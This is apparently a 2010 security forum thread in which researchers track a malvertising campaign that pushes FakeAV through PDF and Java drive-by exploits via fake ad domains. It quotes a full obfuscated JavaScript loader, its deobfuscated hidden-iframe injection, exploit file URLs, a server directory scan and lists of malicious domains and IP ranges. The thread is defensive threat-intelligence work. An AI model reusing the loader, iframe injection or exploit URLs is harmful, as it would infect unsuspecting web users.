Author Topic: adnet.media.*.com domains - NEW TITLE  (Read 15747 times)

0 Members and 1 Guest are viewing this topic.

May 11, 2010, 05:00:59 pm
Read 15747 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Drive by sites serving up FakeAV and exploiting clients through PDF and Java vulnerabilities.

Virus total is only picking up 7/41 on the FakeAV currently.
http://www.virustotal.com/analisis/01b398a0ffe71f4d284df532f7d6112c6d4ca40d8ade4d358ba772f1352fc8ff-1273594077

PDF:
http://relwqin.com/b/pdf/all.pdf

Java:
http://relwqin.com/b/java/gsb2.jar
http://relwqin.com/b/java/bof.jar

Driveby URL:
http://relwqin.com/b/index.php?m=jp

May 11, 2010, 05:06:19 pm
Reply #1

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Entry points to drive by's:

http://alenadi.com/cust.php?n=cust2
http://canteeve.com/cust.php?n=cust2

Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.

May 12, 2010, 02:06:29 pm
Reply #2

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
More today:

http://qwebork.com/a/index.php
http://lutypla.com/a/index.php
http://trynger.com/a/index.php

Looks like it is rotating domains daily (not surprising) and the IP is staying the same for now. Still getting linked to by legit sites that have done business with advertising services that do not provide proper vetting of organizations they choose to do business with it appears.

May 12, 2010, 03:54:00 pm
Reply #3

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
New entry point:

aledat.com

May 12, 2010, 04:13:20 pm
Reply #4

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Code: [Select]
403 http://trynger.com/
200 http://trynger.com/b/
200 http://trynger.com/a/
200 http://trynger.com/e/
200 http://trynger.com/d/
200 http://trynger.com/c/
403 http://trynger.com/cgi-bin/
302 http://trynger.com/config/
200 http://trynger.com/b/index.php
200 http://trynger.com/b/install.php
403 http://trynger.com/b/d/
403 http://trynger.com/b/bin/
403 http://trynger.com/b/include/
403 http://trynger.com/b/java/
403 http://trynger.com/b/pdf/
200 http://trynger.com/b/d/0.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/1.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/2.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/3.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/4.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/5.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/bin/upload.php
200 http://trynger.com/b/include/config.php
200 http://trynger.com/b/java/bof.jar
200 http://trynger.com/b/java/gsb2.jar
200 http://trynger.com/b/pdf/all.pdf
200 http://trynger.com/b/pdf/pdf.php
200 http://trynger.com/a/index.php
200 http://trynger.com/a/install.php
403 http://trynger.com/a/d/
403 http://trynger.com/a/bin/
403 http://trynger.com/a/include/
403 http://trynger.com/a/java/
403 http://trynger.com/a/pdf/
200 http://trynger.com/a/d/0.php
200 http://trynger.com/a/d/1.php
200 http://trynger.com/a/d/2.php
200 http://trynger.com/a/d/3.php
200 http://trynger.com/a/d/4.php
200 http://trynger.com/a/d/5.php
200 http://trynger.com/a/bin/upload.php
200 http://trynger.com/a/include/config.php
200 http://trynger.com/a/java/bof.jar
200 http://trynger.com/a/java/gsb2.jar
200 http://trynger.com/a/pdf/all.pdf
200 http://trynger.com/a/pdf/pdf.php
200 http://trynger.com/e/index.php
200 http://trynger.com/e/install.php
403 http://trynger.com/e/d/
403 http://trynger.com/e/bin/
403 http://trynger.com/e/include/
403 http://trynger.com/e/java/
403 http://trynger.com/e/pdf/
200 http://trynger.com/e/d/0.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/1.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/2.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/4.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/5.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/3.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/bin/upload.php
200 http://trynger.com/e/include/config.php
200 http://trynger.com/e/java/bof.jar
200 http://trynger.com/e/java/gsb2.jar
200 http://trynger.com/e/pdf/all.pdf
200 http://trynger.com/e/pdf/pdf.php
200 http://trynger.com/d/index.php
200 http://trynger.com/d/install.php
403 http://trynger.com/d/d/
403 http://trynger.com/d/bin/
403 http://trynger.com/d/include/
403 http://trynger.com/d/java/
403 http://trynger.com/d/pdf/
200 http://trynger.com/d/d/0.php
200 http://trynger.com/d/d/1.php
200 http://trynger.com/d/d/2.php
200 http://trynger.com/d/d/4.php
200 http://trynger.com/d/d/5.php
200 http://trynger.com/d/d/3.php
200 http://trynger.com/d/bin/upload.php
200 http://trynger.com/d/include/config.php
200 http://trynger.com/d/java/bof.jar
200 http://trynger.com/d/java/gsb2.jar
200 http://trynger.com/d/pdf/all.pdf
200 http://trynger.com/d/pdf/pdf.php
200 http://trynger.com/c/index.php
200 http://trynger.com/c/install.php
403 http://trynger.com/c/d/
403 http://trynger.com/c/bin/
403 http://trynger.com/c/include/
403 http://trynger.com/c/java/
403 http://trynger.com/c/pdf/
200 http://trynger.com/c/d/0.php
200 http://trynger.com/c/d/1.php
200 http://trynger.com/c/d/3.php
200 http://trynger.com/c/d/2.php
200 http://trynger.com/c/d/4.php
200 http://trynger.com/c/d/5.php
200 http://trynger.com/c/bin/upload.php
200 http://trynger.com/c/include/config.php
200 http://trynger.com/c/java/bof.jar
200 http://trynger.com/c/java/gsb2.jar
200 http://trynger.com/c/pdf/all.pdf
200 http://trynger.com/c/pdf/pdf.php
Code: [Select]
200 http://aledat.com/
200 http://aledat.com/cust.php
200 http://aledat.com/index.php
200 http://aledat.com/phpinfo.php
403 http://aledat.com/b/
403 http://aledat.com/w/
403 http://aledat.com/ad/
403 http://aledat.com/cgi-bin/
403 http://aledat.com/ad/js/

edit: forgot the other one :D

May 12, 2010, 06:02:26 pm
Reply #5

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Found the advertising server that is redirecting to the intermediary and eventually the exploit sites:

adnet.media.roxantb.com

That domain was registered last month and serves up packed/obfuscated javascript:

Code: [Select]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|1e0207526271ff2eedf4423bec450e06a6f1f528ac28ea9c4050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1167111c271c61c2dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd353c74638daa560bbc7450439e830637fdc07a4226081064f1a81a3a041041025346a428663c1125e31404104102b7f48428663c106d7b240d03df82daa6a33958fb72e063be15334d81a5f1ca38ad0051dc1d2515d364525644f5320b3f2125e31410161ec050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1362a6bc19de87c1678dc41a844d71e9390b0cec8741fb659b08f567703cd1f415334d80c8047520b93d527e6ea61936fa60ae650f0730a9f167111c31fa20d0592c0220f6b3030dfff80edc77008c468b3208b7106d8142234f47406d6e04034948b2da7f6024f82a038588d62dc5030115424a0532e9d23bfc961757fb00b29df70a160b62ee078d247a6730b29df731d765039c4d912b4ec5b11b9dc623ef17438588d60297027241f38f10ab52527898691655b231eb65f715461bd29b668622be1d2074ae1011412280f73d7d2b49a3a11070d52dbe78c05a3ac43233df42f9a9ff07547a5148f29700897fa3032d8c274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf1c1cbbe15ca10c0be411b0faec0009c222e08d6bf30c8d81a233f12724e8ae21128b9d14a49f815461bd30849002c04c3f036c44b193f8d01542b392c6bb5c021099f1c8a3fe0a480c70b2189106ff0b11c9ab7f173b8bb26700e401d1f9e171b134087cabc22a9b812854a9535c7dc72f9f68425e0d392e8f91b3836d0f21d915a067e04e1057eea073afcf10810671ca2ccd2dbe8560dcf5f617804470b679950fa04fa28d0bd3296c29930746f535a751111ce64728001ce1d7ac4a283623e0522faa39d77db058275b16aa6ed34e43590c1b15a2119788193c20a274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf2dbf1501bb943b316f25238e312b0dd21811a037b5399384d3294b8a36da9b62cb6fc1392303d0cda4430a605f00e5e84322e4e23316b13012d4bfa0f22aac013e4d91a0efac25b58782c4047801d16b5121ce8a30660b71263fe915b9df1009dca82badb6924531452dcbe66145c41d07c1b28043431e382c01a2b416f42ff2347187b04a1d56b4333a22b53893393269aa271dd73b20d457861ebef29262c1330b80af7003f04d184586c0e4931d03400fe2e46aaf20aa7542a03011171ac1e35fd8b32ff23471b9dad832f6d501286e8e352dc9f0da8e94318d7b00cc6a6805a4a8918869d90c4c46c16bcaaf2f14b3e29d353420063ff1dddce30c50ff82654d24316da3000a3eac105373a208e740122df942e088031195c680175b9d27593bf2a67f1831ff59d26a48d107f41ac0b052c519f0aae1d81ab519085a705426ca1857780362f28322268012dc7c7919c0f7029460321cf70b71d5dbd7355d91929460322706ca73835f5618eb1962545dfe2fa283c372e3fb1610872174eef327148c315ad7120ce58701b9dad832f6d500995ef901f626d2939e0e082f1b1267704e15710252713bc524d2dd614593b414fbe990bb34a6015f07d0fffcec1b1a148215b373298545e0206bc820bf59c31ef6ca37b300814349323795d8c336fcd11f2dcd328d0bd314d2eb03813ce001e0cd01be68b90e3af110b2d8cd316da30021427b37bc5351d7ac4a0dde4c303e297435999cf34cfa0e0b10ba4346d54f0da70920ea16690ca99ae086c7401e2c8990abb2f10952f3f0006bb0160c00c1ac67b42010e990b0879726b75a6385db6921dc6122ae56512719841386ebf2109caaa2eedf4435d99f109440781fc1e7237a1ecc08176460661abe011bcc01d7561f1c27b2438971a338b9e162c37b1800df36c07260ed03c38dc25b15a41ff09700fbebfb2f952c31f92b83184062b084071f244f8a81ab739a26cc15c0342f2a111200009c9b5801f626d2939e0e082f1b1267704e18ca28f|Math|floor|break|splice|3451759|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|60670333|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
Deobfuscated:
Code: [Select]
<iframe src="http://aledat.com/cust.php?n=cust2" style="visibility: hidden;" height="1" width="1"></iframe>
<iframe class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/stats_js_e.php?id=22214735" style="visibility: hidden;" height="1" width="1"></iframe>
<a href="http://curves.com/?=34547" target="_blank">
<img class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/banners/load.php?id=22214735" border="0"></a>

In this instance, the aledat.com/cust.php?n=cust2 request redirects to another site that actually has the driveby kit on it.

May 12, 2010, 06:06:57 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3324
What exactly is the url of obfuscated code ?
Ruining the bad guy's day

May 12, 2010, 06:23:01 pm
Reply #7

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
There is also another domain name on this IP, I should be able to churn up some more domains now.

adnet.media.plebert.com


May 12, 2010, 06:29:13 pm
Reply #8

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
What exactly is the url of obfuscated code ?

here is an example one:

http://adnet.media.roxantb.com/bn/j/cd/?rq=104192&sid=22214735&m=514&tn=7&d=s&ct=1&t=s

May 12, 2010, 07:07:53 pm
Reply #9

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Malvertising hostnames:
adnet.media.roxantb.com
adnet.media.plebert.com
adnet.media.ditent.com
adnet.media.modicea.com

IP addresses:
188.72.192.52
188.72.192.67
188.72.192.221

May 12, 2010, 08:03:36 pm
Reply #10

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Sooooo, yea, there is tons of badness going on in here. Basically, all traffic to the 188.72.192.0/24 should be considered suspect.

Hostnames within the 188.72.192.0/24 we have seen traffic to/from in the last month or so:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
aledat.com
alenadi.com
canteeve.com
media.fastclick.net.attesca.com
mediastatsfx.com
sefito.com
stathyte.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
www.downloads.ws - [i]Probably[/i] not a malware site...

Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.

May 13, 2010, 02:50:51 am
Reply #11

Kimberly

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 13
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.

May 13, 2010, 04:10:54 pm
Reply #12

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.

Most of the time it is when people login to the live.com mail account, the banner ad has the packed/obfuscated javascript that is served up by one of the following domains:

ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
media.fastclick.net.attesca.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com

Then that JavaScript from the above list of sites includes an iframe that loads content from the following domains:
aledat.com/?cust=2
alenadi.com/?cust=2
canteeve.com/?cust=2
sefito.com/?cust=2
stathyte.com/?cust=2

Then the content loaded from those sites causes the actual drive by's to be loaded from the following sites which all resolve to 194.8.250.60/194.8.250.61:

polkita.com
www.lutypla.com
zarenaga.com
turkinke.com
relwqin.com
trynger.com
qwebork.com

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.

May 13, 2010, 04:59:00 pm
Reply #13

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Forgot to add that anything within the 194.8.250.0/24 should also be considered suspect.

194.8.250.0/24 - Hosts the drive by's, exploits and malware.
188.72.192.0/24 - Hosts the Malicious advertising services redirecting to the drive by, exploit and malware.

May 14, 2010, 02:41:06 pm
Reply #14

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Domains we have seen using these advertising services, primarily the most referrers have been mail.live.com servers once users have logged in to check their mail.

Code: [Select]
ad.doubleclick.net
adnet.media.ditent.com
ad.yieldmanager.com
anet.tradedoubler.com
apps.detnews.com
b5.boards2go.com
beforeitsnews.com
blogs.citizen-times.com
blogs.desmoinesregister.com
bobshouseofvideogames.com
caloriecount.about.com
classifieds.gftribune.com
comics.com
courier-journal.weather.gannettonline.com
cvhs.adbureau.net
dailyfreeman.ca.kaango.com
dailylocal.com
dailysquee.com
data.tennessean.com
delcotimes.com
detnews.com
forums.televisionwithoutpity.com
googleads.g.doubleclick.net
hawaiipreps.honoluluadvertiser.com
hfboards.com
ihasahotdog.com
lumberjocks.com
macombdaily.com
mainlinemedianews.com
mediatakeout.com
middletownpress.com
moneycentral.msn.com
movies.msn.com
msn.foxsports.com
mylifeisaverage.com
nashvillecitypaper.com
nbcsports.msnbc.com
nhregister.com
obituaries.citizen-times.com
ouinsider.com
oxygen.com
photos.indystar.com
php.app.com
pioneer.olivesoftware.com
pqasb.pqarchiver.com
pubads.g.doubleclick.net
ratemyprofessors.com
saratogian.com
sec.todaysthv.com
svc1.m5prod.net
tag.admeld.com
thedailywh.at
the.honoluluadvertiser.com
topix.cachefly.net
trentonian.com
troyrecord.com
tv.msn.com
webmail.peoplepc.com
www.13wmaz.com
www.49erswebzone.com
www.9news.com
www.apartments.com
www.app.com
www.argusleader.com
www.azcentral.com
www.barnesandnoble.com
www.baxterbulletin.com
www.bigeasyclassifieds.com
www.calgarysun.com
www.captivate.com
www.cars.com
www.casttv.com
www.charter.net
www.chillicothegazette.com
www.citizen-times.com
www.clarionledger.com
www.cnweekly.com
www.coshoctontribune.com
www.courier-journal.com
www.courierpostonline.com
www.crimsonconfidential.com
www.dailyfreeman.com
www.dailylocal.com
www.dailyrecord.com
www.dailyworld.com
www.darkroastedblend.com
www.delawareonline.com
www.delcotimes.com
www.delmarvanow.com
www.democratandchronicle.com
www.desmoinesregister.com
www.excite.com
www.federaltimes.com
www.fishexplorer.com
www.floridatoday.com
www.fox5vegas.com
www.freep.com
www.greatfallstribune.com
www.greenandwhite.com
www.greenbaypressgazette.com
www.guampdn.com
www.hawaiinavynews.com
www.heritage.com
www.heritagenews.com
www.honoluluadvertiser.com
www.huffingtonpost.com
www.india-forums.com
www.lansingstatejournal.com
www.legacy.com
www.lohud.com
www.macombdaily.com
www.mainlinemedianews.com
www.mentalfloss.com
www.middletownpress.com
www.montgomeryadvertiser.com
www.morningjournal.com
www.mycentraljersey.com
www.nashuatelegraph.com
www.neogaf.com
www.news-herald.com
www.newsleader.com
www.news-press.com
www.nextdaypets.com
www.nhregister.com
www.oneidadispatch.com
www.overclockersclub.com
www.portclintonnewsherald.com
www.pottsmerc.com
www.pottstownmercury.com
www.press-citizen.com
www.pressconnects.com
www.prosportsdaily.com
www.racingjunk.com
www.rawstory.com
www.registercitizen.com
www.rgj.com
www.saratogian.com
www.speedwaymedia.com
www.stevenspointjournal.com
www.tallahassee.com
www.televisionwithoutpity.com
www.tennessean.com
www.tetongravity.com
www.theadvertiser.com
www.thecalifornian.com
www.theithacajournal.com
www.themorningsun.com
www.thenewsstar.com
www.thereporteronline.com
www.thespectrum.com
www.thetimesherald.com
www.timesherald.com
www.tmnews.com
www.tomshardware.com
www.trentonian.com
www.troyrecord.com
www.universalsports.com
www.usanetwork.com
www.visaliatimesdelta.com
www.wausaudailyherald.com
www.wbir.com
www.wisconsinrapidstribune.com
www.worldtimeserver.com
www.wtsp.com
www.wusa9.com
www.zanesvilletimesrecorder.com